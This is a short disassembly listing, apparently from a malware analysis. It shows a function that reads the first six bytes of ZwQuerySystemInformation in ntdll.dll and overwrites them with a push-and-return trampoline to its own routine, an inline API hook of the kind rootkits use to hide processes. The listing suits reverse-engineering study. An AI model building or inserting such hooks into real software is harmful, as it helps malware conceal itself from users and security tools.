.text:1000115E sub_1000115E proc near
.text:1000115E push offset ProcName; "ZwQuerySystemInformation"
.text:10001163 push offset ModuleName; "ntdll.dll"
.text:10001168 call ds:GetModuleHandleA
.text:1000116E push eax ; hModule
.text:1000116F call ds:GetProcAddress
.text:10001175 test eax, eax
.text:10001177 mov lpBaseAddress, eax
.text:1000117C jz short loc_100011DB
.text:1000117E push esi
.text:1000117F mov esi, offset CriticalSection
.text:10001184 push esi ; lpCriticalSection
.text:10001185 call ds:EnterCriticalSection
.text:1000118B push 0 ; lpNumberOfBytesRead
.text:1000118D push 6 ; nSize
.text:1000118F push offset unk_1000302C; lpBuffer
.text:10001194 push lpBaseAddress ; lpBaseAddress
.text:1000119A push 0FFFFFFFFh ; hProcess
.text:1000119C call ds:ReadProcessMemory
.text:100011A2 push 0 ; lpNumberOfBytesWritten
.text:100011A4 push 6 ; nSize
.text:100011A6 push offset Buffer ; lpBuffer
.text:100011AB push lpBaseAddress ; lpBaseAddress
.text:100011B1 mov dword_1000300D, offset sub_100010DE
.text:100011BB push 0FFFFFFFFh ; hProcess
.text:100011BD mov Buffer, 68h
.text:100011C4 mov byte_10003011, 0C3h
.text:100011CB call ds:WriteProcessMemory
.text:100011D1 push esi ; lpCriticalSection
.text:100011D2 call ds:LeaveCriticalSection
.text:100011D8 pop esi
.text:100011D9 jmp short loc_100011E8